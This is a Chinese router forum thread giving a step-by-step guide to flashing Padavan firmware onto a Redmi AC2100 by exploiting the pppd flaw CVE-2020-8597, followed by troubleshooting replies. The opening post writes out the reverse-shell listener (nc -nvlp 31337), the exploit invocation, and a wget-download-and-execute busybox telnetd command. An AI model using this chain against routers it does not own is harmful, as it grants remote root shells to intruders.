恩山无线论坛

标题: [2020-05-07]padavan适配红米AC2100，更新单网卡视频刷机教程 [打印本页]

作者: 237176253 时间: 2020-4-24 22:15
标题: [2020-05-07]padavan适配红米AC2100，更新单网卡视频刷机教程
本帖最后由 237176253 于 2020-7-21 12:45 编辑

请删除微博，谢谢

录了个视频，有需要的可以看一下：https://www.bilibili.com/video/BV1Sk4y1r7H1/楼下有pppoe和scapy等都配置好了的虚拟机打包下载，方便软件源下载困难的人士使用。

小米官网之前的救砖工具红米依然可用，所以随便刷。
设置红米为pppoe拨号，用户名name，密码passwd。用一根网线将红米的wan和紧邻的lan连接，另一根网线连接电脑和剩下一个紧邻的lan（别连到最边上那个）
剩余流程：（用我上传的虚拟机的直接从第二步开始）
1.虚拟机ubuntu20运行sudo apt-get install python3-scapy&&sudo apt install net-tools 并建好pppoe服务器（参考7楼）。
将2楼网盘内的busybox和pppd-cve.py（里面的eth0改为自己的有线网卡名，可用ifconfig测试，如图里我的是ens33）还有剩余的两个固件放到ubuntu任一目录。

2.用我传的虚拟机的可以直接从这开始
有线网卡设置固定ip为192.168.31.177,改ip后记得开关下网卡。在下载目录打开命令行窗口，运行python3 -m http.server 8081 & 建立http服务器。用手机看看 http://192.168.31.177:8081/能否正常打开，不能打开就自行检查防火墙，再考虑后面的
该目录打开窗口运行sudo pppoe-server -I ens33 -L 192.168.5.1 -R 192.168.5.5 -N 10 路由器能拨上号后再考虑后面的。
再次打开窗口，运行nc -nvlp 31337
再次打开窗口，运行sudo python3 pppd-cve.py 此时注意运行nc-nvlp 31337的窗口，一但收到连接立刻在nc的窗口里运行（一定要先运行nc再运行python脚本）
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
运行成功如图

如果连接中途断开，则重复运行上面最后两步（指python和nc-nvlp两个窗口）。完成后运行telnet 192.168.31.1，依次运行
wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write r3g.bin kernel1

运行完成后会进入op(用户名root 密码admin)此时可切换到windows。如果拿不到ip，请手动设置有线网卡ip为192.168.1.23，网关为192.168.1.1，网关掩码255.255.255.0。winscp将老毛子固件传到tmp目录下，用putty之类的连路由器运行
mtd -r write /tmp/redmi.trx kernel

自动重启进入老毛子。

5G可开160MHZ

速度如下

固件主要集成了网易云和低调上网

作者: 237176253 时间: 2020-4-24 22:15
本帖最后由 237176253 于 2020-4-30 14:25 编辑

配好环境的ubuntu，密码739870，个人用的虚拟机是VMware 15.5 pro.有关脚本和固件在download目录内
链接: https://pan.baidu.com/s/1OELQj1OOwE9MqFAQscllmQ 提取码: 2ue2
固件和脚本等下载
https://sssddddff.lanzous.com/ibzsmij

作者: 青木丶 时间: 2020-4-24 22:19
沙发谢谢大佬。ac2100有救了

作者: 相守一生丶 时间: 2020-4-24 22:21
抓紧下载一下了。。小米路由器AC2100(R2100) 小米路由器AC2100(R2100) 这个型号的对吧。

作者: xiaomm 时间: 2020-4-24 22:22
一看到nc -nvlp 31337，我就觉得熟悉了。

作者: 青木丶 时间: 2020-4-24 22:25
2.4g速度有多少呢

作者: 237176253 时间: 2020-4-24 22:28
本帖最后由 237176253 于 2020-4-30 14:17 编辑

https://blog.csdn.net/rheostat/article/details/806977 桥接参考这个。运行以下命令可安装pppoe服务器，启动前用网盘文件夹pppoe文件夹的内容替换/etc/ppp下的三个文件。(运行sudo nautilus，用这个文件管理器替换）
wget -c https://dianne.skoll手动替换为点ca/projects/rp-pppoe/download/rp-pppoe-3.13.tar.gz

sudo tar zxvf rp-pppoe-3.13.tar.gz -C /opt/
sudo chown -R root:root /opt/rp-pppoe-3.13/

sudo apt-get install build-essential

sudo /opt/rp-pppoe-3.13/go （这步一路回车，防火墙那好像选0好点）

sudo killall pppoe-server
sudo pppoe-server -I ens33 -L 192.168.5.1 -R 192.168.5.5 -N 10 （ens33改为自己的网卡名）

作者: 你说啥 时间: 2020-4-24 22:34
老哥这个多拨怎么样

作者: MIRROR-D 时间: 2020-4-24 22:39
厉害，搞得我都有心去搞一个AC2100过渡了，而且还可以开160mhz，感觉会很不错的样子

作者: 297118122 时间: 2020-4-24 22:44
太难，看不懂

作者: yeting11 时间: 2020-4-24 23:01
太难了，裂开

作者: Es2018 时间: 2020-4-24 23:13
nb 666...

作者: 星X逝X 时间: 2020-4-24 23:16
杯了呀这都可以

作者: Dane_Z 时间: 2020-4-24 23:26
OP默认设置密码了没？怎么连

作者: 237176253 时间: 2020-4-24 23:28

Dane_Z 发表于 2020-4-24 23:26
OP默认设置密码了没？怎么连

admin

作者: juewuy 时间: 2020-4-24 23:31
nb了！这下瞬间成神机了可战k2p

作者: 桑德斯ww 时间: 2020-4-24 23:40
太难了。。新手等一个详细的教程

作者: a765572213 时间: 2020-4-25 00:58
我放弃了，没有一点小白看得懂的

作者: 紫晶怪兽 时间: 2020-4-25 01:00
支持一下，过来看看

作者: 青木丶 时间: 2020-4-25 02:32
拨号678什么情况呢都跟着教程来的

作者: 青木丶 时间: 2020-4-25 02:54
搭建好了pppoe服务器路由器连不上，（台式机没有无线网卡，笔记本没在身边可行吗）也桥接过了，就是死活拨不上号，错误就是678，mtu也修改了

看到你帖子马上起床搞到现在竟然失败了

作者: fyi2000 时间: 2020-4-25 04:31
Embedded System Testing Blog: How to install Windows PPPoE Server (RasPPPoE)
RASPPPoE Server

作者: wskgurh 时间: 2020-4-25 07:36
小白用户表示不会啊！

作者: voldemort 时间: 2020-4-25 07:48
楼主🈶小米救砖工具吗，以防万一

作者: 青木丶 时间: 2020-4-25 09:36
还是拨不上号，pppoe服务器确实打开了

作者: 237176253 时间: 2020-4-25 09:38

青木丶发表于 2020-4-25 02:54
搭建好了pppoe服务器路由器连不上，（台式机没有无线网卡，笔记本没在身边可行吗）也桥接过了，就是死活拨 ...

你看看ubuntu内有线网卡是不是开启的。有时候没插线他会自动关闭，还有启动服务器时接口名绑定对了没有。

作者: 237176253 时间: 2020-4-25 09:39

青木丶发表于 2020-4-25 02:54
搭建好了pppoe服务器路由器连不上，（台式机没有无线网卡，笔记本没在身边可行吗）也桥接过了，就是死活拨 ...

没无线网卡就要其他设备搭web服务器，比较麻烦。随便去买个2.4g的usb网卡吧，最多20元

作者: 青木丶 时间: 2020-4-25 09:44

237176253 发表于 2020-4-25 09:39
没无线网卡就要其他设备搭web服务器，比较麻烦。随便去买个2.4g的usb网卡吧，最多20元

有无线网卡了搞了一个

作者: 237176253 时间: 2020-4-25 09:46

青木丶发表于 2020-4-25 09:44
有无线网卡了搞了一个

建议先测下桥接是否成功再搞其他的。（不设置固定ip，看看路由器内是否能看到ubuntu设备）。成功了再改IP，那个有线接口一但没插线挺容易自动关闭的

作者: 青木丶 时间: 2020-4-25 09:47
[attach]378231[/attach]
都可以就是错误678 搞了半天了

作者: alexguo1981 时间: 2020-4-25 10:16
我发现我除了有台式机，笔记本，usb网卡，无线网卡这些，其他的一概不会

作者: pnq 时间: 2020-4-25 11:09
我实测路由器不用正确的pppoe密码也能触发反向shell

作者: czc2020 时间: 2020-4-25 11:33
麻烦给下padavan配置文件我编译看看

作者: czc2020 时间: 2020-4-25 11:34

czc2020 发表于 2020-4-25 11:33
麻烦给下padavan配置文件我编译看看

信号怎么样测试下好的话可以入手

作者: czc2020 时间: 2020-4-25 11:36
楼主可以出个图文教程然后把命令写成脚本一键破处

作者: HCH0086 时间: 2020-4-25 12:22
求助大佬
搭建好pppoe后pppoe-start 显示超时怎么解决

作者: 237176253 时间: 2020-4-25 12:38

pnq 发表于 2020-4-25 11:09
我实测路由器不用正确的pppoe密码也能触发反向shell

啥意思，不用拨上号也可以吗?只要路由器设置的pppoe就行?

作者: HCH0086 时间: 2020-4-25 13:02

HCH0086 发表于 2020-4-25 12:22
求助大佬
搭建好pppoe后pppoe-start 显示超时怎么解决

打扰了，才发现和这个命令没关系
但是先用手边一个辣鸡腾达路由拨号失败说远端服务器无响应。。

作者: 237176253 时间: 2020-4-25 13:09

HCH0086 发表于 2020-4-25 13:02
打扰了，才发现和这个命令没关系
但是先用手边一个辣鸡腾达路由拨号失败说远端服务器无响应。。

/etc/ppp/options替换成附件里的内容

作者: 352033412 时间: 2020-4-25 13:37
执行mtd -r write redmi.trx kernel
后不能开机成功了，亮橙灯

作者: HCH0086 时间: 2020-4-25 13:38

237176253 发表于 2020-4-25 13:09
/etc/ppp/options替换成附件里的内容

多谢大佬我试试

作者: awp8008 时间: 2020-4-25 13:59
期待固件和k2p信号强度网速对比

作者: Dane_Z 时间: 2020-4-25 14:13

352033412 发表于 2020-4-25 13:37
执行mtd -r write redmi.trx kernel
后不能开机成功了，亮橙灯

同，启动不了

作者: 丶将心比心 时间: 2020-4-25 14:33
太难了。。。。。。。

作者: 237176253 时间: 2020-4-25 14:49

352033412 发表于 2020-4-25 13:37
执行mtd -r write redmi.trx kernel
后不能开机成功了，亮橙灯

我后面重新上传了。。。开始编译时分区设小了

作者: 237176253 时间: 2020-4-25 14:49

Dane_Z 发表于 2020-4-25 14:13
同，启动不了

我后面重新上传了个，开始编译时分区设小了。。。

作者: 352033412 时间: 2020-4-25 15:21

用了新上传的文件就好了，谢谢

作者: Dane_Z 时间: 2020-4-25 15:23

237176253 发表于 2020-4-25 14:49
我后面重新上传了个，开始编译时分区设小了。。。

有编译的配置模板么？

作者: 297118122 时间: 2020-4-25 15:25

352033412 发表于 2020-4-25 15:21
用了新上传的文件就好了，谢谢

都用上了

作者: 青木丶 时间: 2020-4-25 15:25

Dane_Z 发表于 2020-4-25 15:23
有编译的配置模板么？

老哥你搞好了吗。我搭建pppoe服务器连上了，就是虚拟机8081端口机内能访问，回到主机和wifi就进不去了卡在这一步半天了

作者: HCH0086 时间: 2020-4-25 15:25

青木丶发表于 2020-4-25 09:47
都可以就是错误678 搞了半天了

遇到了同样的问题

作者: HCH0086 时间: 2020-4-25 15:26

237176253 发表于 2020-4-25 13:09
/etc/ppp/options替换成附件里的内容

错误678，服了

作者: HCH0086 时间: 2020-4-25 15:28

352033412 发表于 2020-4-25 15:21
用了新上传的文件就好了，谢谢

可以说下系统版本和桥接设置吗，我按帖子来拨号错误678

作者: 青木丶 时间: 2020-4-25 15:31

HCH0086 发表于 2020-4-25 15:25
遇到了同样的问题

我解决开用楼主替换就行了

作者: HCH0086 时间: 2020-4-25 15:33

青木丶发表于 2020-4-25 15:31
我解决开用楼主替换就行了

替换了，也不行，我服了，20.04LTS 的Ubuntu

作者: mypython 时间: 2020-4-25 15:36
本帖最后由 mypython 于 2020-4-25 15:40 编辑

大神，执行完 mtd -r write r3g.bin kernel1，显示rebooting，然后连不上了，怎么办？路由器重新插电后是蓝灯。

感觉变砖了。。。。。。。。。。求救砖教程！

作者: 352033412 时间: 2020-4-25 15:46

mypython 发表于 2020-4-25 15:36
大神，执行完 mtd -r write r3g.bin kernel1，显示rebooting，然后连不上了，怎么办？路由器重新插电后 ...

设置连lan口设置静态ip， 192.168.1.x
然后ssh root@192.168.1.1 就行了，没砖，正常现象

作者: Dane_Z 时间: 2020-4-25 16:13
刷机成功，非常完美，一切都正常

作者: Dane_Z 时间: 2020-4-25 16:14

青木丶发表于 2020-4-24 22:25
2.4g速度有多少呢

刚拿手机测了下100Mbps上下波动
5G可以轻松跑满到520Mbps

作者: mypython 时间: 2020-4-25 16:31

352033412 发表于 2020-4-25 15:46
设置连lan口设置静态ip， 192.168.1.x
然后ssh 就行了，没砖，正常现象

多谢大神支持

。搞定啦！这下可以好好折腾一下了。

[attach]378454[/attach]

作者: pnq 时间: 2020-4-25 16:57

237176253 发表于 2020-4-25 12:38
啥意思，不用拨上号也可以吗?只要路由器设置的pppoe就行?

要拨号，只是拨号时用的用户名和密码可以是错的。

作者: 237176253 时间: 2020-4-25 17:00

pnq 发表于 2020-4-25 16:57
要拨号，只是拨号时用的用户名和密码可以是错的。

密码错的，那也没拨上。那可以不搭建pppoe服务器，只需要路由器设置pppoe拨号就行？

作者: kalelaikan 时间: 2020-4-25 17:00
请问大佬有线是连在路由器wan口的对吗？

作者: 237176253 时间: 2020-4-25 17:03

kalelaikan 发表于 2020-4-25 17:00
请问大佬有线是连在路由器wan口的对吗？

是的

作者: Dane_Z 时间: 2020-4-25 17:07

Dane_Z 发表于 2020-4-25 16:14
刚拿手机测了下100Mbps上下波动
5G可以轻松跑满到520Mbps

补充下2.4G可以跑到180Mbps

作者: pnq 时间: 2020-4-25 17:15

237176253 发表于 2020-4-25 17:00
密码错的，那也没拨上。那可以不搭建pppoe服务器，只需要路由器设置pppoe拨号就行？

pppoe服务器是一定要搭建的

作者: 5112075 时间: 2020-4-25 17:27
CVE-2020-8597估计很多路由都中招

作者: 297118122 时间: 2020-4-25 17:48

pnq 发表于 2020-4-25 17:15
pppoe服务器是一定要搭建的

用openwrt固件路由搭建可以不

作者: pnq 时间: 2020-4-25 18:42

297118122 发表于 2020-4-25 17:48
用openwrt固件路由搭建可以不

可以的，我试过了

作者: 237176253 时间: 2020-4-25 18:45

pnq 发表于 2020-4-25 18:42
可以的，我试过了

拨号连上op的话，那个python脚本又咋执行呢？没看太懂

作者: LC2013 时间: 2020-4-25 19:32
这个固件做AP的话，和原厂固件比怎么样呢？

作者: 297118122 时间: 2020-4-25 19:39
本帖最后由 297118122 于 2020-4-25 19:53 编辑

pnq 发表于 2020-4-25 18:42
可以的，我试过了

帮忙写下教程呗，如果能用路由搭建服务器，就要简单好多

作者: A_XIAOWU 时间: 2020-4-25 19:57
太难了，等大佬做一键安装程序

作者: HCH0086 时间: 2020-4-25 20:01
我服了我真服了我装了个物理机Ubuntu拨号还是连不上。。。

作者: 237176253 时间: 2020-4-25 20:03

HCH0086 发表于 2020-4-25 20:01
我服了我真服了我装了个物理机Ubuntu拨号还是连不上。。。

7楼链接里的/etc/ppp/pppoe-server-options- 对着帖子改了吗

作者: HCH0086 时间: 2020-4-25 20:04

237176253 发表于 2020-4-25 20:03
7楼链接里的/etc/ppp/pppoe-server-options- 对着帖子改了吗

改过了，所有的设置都试过了，路由还是远端服务器无响应，干，硬件问题？

作者: 237176253 时间: 2020-4-25 20:11

HCH0086 发表于 2020-4-25 20:04
改过了，所有的设置都试过了，路由还是远端服务器无响应，干，硬件问题？

不可能吧。我电脑还是个外接的usb有线网卡

作者: 237176253 时间: 2020-4-25 20:14

HCH0086 发表于 2020-4-25 20:04
改过了，所有的设置都试过了，路由还是远端服务器无响应，干，硬件问题？

启动pppoe的时候接口绑定对没有?还有不插网线有时候网卡也会自动关闭

作者: kalelaikan 时间: 2020-4-25 20:28

pnq 发表于 2020-4-25 18:42
可以的，我试过了

求大佬出教程

作者: HCH0086 时间: 2020-4-25 20:35

237176253 发表于 2020-4-25 20:14
启动pppoe的时候接口绑定对没有?还有不插网线有时候网卡也会自动关闭

应该都没有问题，发现很神奇的一件事，网线接着路由的时候在windows可以拨号成功，但是路由怎样也连不上

作者: 237176253 时间: 2020-4-25 20:41

HCH0086 发表于 2020-4-25 20:35
应该都没有问题，发现很神奇的一件事，网线接着路由的时候在windows可以拨号成功，但是路由怎样也连不上
...

网线要接路由器的wan啊。。。。你是接lan了？不然想不出来为啥windows能拨上

作者: 441837297 时间: 2020-4-25 20:52
大佬厉害

玩路由的乐趣就在于折腾

作者: HCH0086 时间: 2020-4-25 20:56

237176253 发表于 2020-4-25 20:41
网线要接路由器的wan啊。。。。你是接lan了？不然想不出来为啥windows能拨上

接的是wan

作者: lovingyf 时间: 2020-4-25 20:56
请问这个刷完，还能再刷回官方系统吗

作者: 237176253 时间: 2020-4-25 20:56

HCH0086 发表于 2020-4-25 20:56
接的是wan

你接wan，咋windows还能拨上？你是那哪里搞错了应该

作者: Dane_Z 时间: 2020-4-25 20:59

lovingyf 发表于 2020-4-25 20:56
请问这个刷完，还能再刷回官方系统吗

没有动bootloader救砖工具随时无损回官方

作者: lovingyf 时间: 2020-4-25 21:00

237176253 发表于 2020-4-25 20:56
你接wan，咋windows还能拨上？你是那哪里搞错了应该

大佬，我配置好只差刷机了，我想问一下，这个，刷完不喜欢的话，还能刷回去官方系统吗？

作者: 237176253 时间: 2020-4-25 21:01

lovingyf 发表于 2020-4-25 21:00
大佬，我配置好只差刷机了，我想问一下，这个，刷完不喜欢的话，还能刷回去官方系统吗？

你就是刷砖了都能回官方。我试的时候就砖过

作者: lovingyf 时间: 2020-4-25 21:01

Dane_Z 发表于 2020-4-25 20:59
没有动bootloader救砖工具随时无损回官方

好的谢谢哈哈哈哈哈哈哈

作者: lovingyf 时间: 2020-4-25 21:02

237176253 发表于 2020-4-25 21:01
你就是刷砖了都能回官方。我试的时候就砖过

好的，谢谢，哈哈哈哈哈，我要开始啦。

作者: HCH0086 时间: 2020-4-25 21:05

237176253 发表于 2020-4-25 20:56
你接wan，咋windows还能拨上？你是那哪里搞错了应该

和，系统版本有关吗

作者: 237176253 时间: 2020-4-25 21:11

HCH0086 发表于 2020-4-25 21:05
和，系统版本有关吗

应该是设置问题，具体哪不对这个只有你自己才能查清楚。你windows居然能拨上，说明搭建pppoe服务器那是正常的。

作者: voldemort 时间: 2020-4-25 21:38
楼主，无法执行./busybox二进制文件是怎么回事？

作者: 4088942 时间: 2020-4-25 21:47
两台电脑可以吗，一台装u系统利用漏洞，一台windows

作者: 4088942 时间: 2020-4-25 21:54

237176253 发表于 2020-4-25 21:11
应该是设置问题，具体哪不对这个只有你自己才能查清楚。你windows居然能拨上，说明搭建pppoe服务器那是正 ...

跟K2P老毛子pk一下，期待你的评测

作者: pnq 时间: 2020-4-25 21:55

297118122 发表于 2020-4-25 19:39
帮忙写下教程呗，如果能用路由搭建服务器，就要简单好多

我的路由器（极路由3）也是linux系统(openwrt)，所以也可以装python，我就是在路由器上执行的py脚本。

作者: Demon_pika1 时间: 2020-4-25 22:06
等一个弱智版的视屏教程。。。。

作者: lovingyf 时间: 2020-4-25 22:08

Dane_Z 发表于 2020-4-25 20:59
没有动bootloader救砖工具随时无损回官方

请问运行pppd-cve 出现了eap——md5 not define咋个回事啊

作者: lovingyf 时间: 2020-4-25 22:21
请问运行pppd-cve 出现了eap——md5 not define咋个回事啊

作者: 237176253 时间: 2020-4-25 22:27

4088942 发表于 2020-4-25 21:47
两台电脑可以吗，一台装u系统利用漏洞，一台windows

当然可以

欢迎光临恩山无线论坛 (https://www.right.com.cn/FORUM/)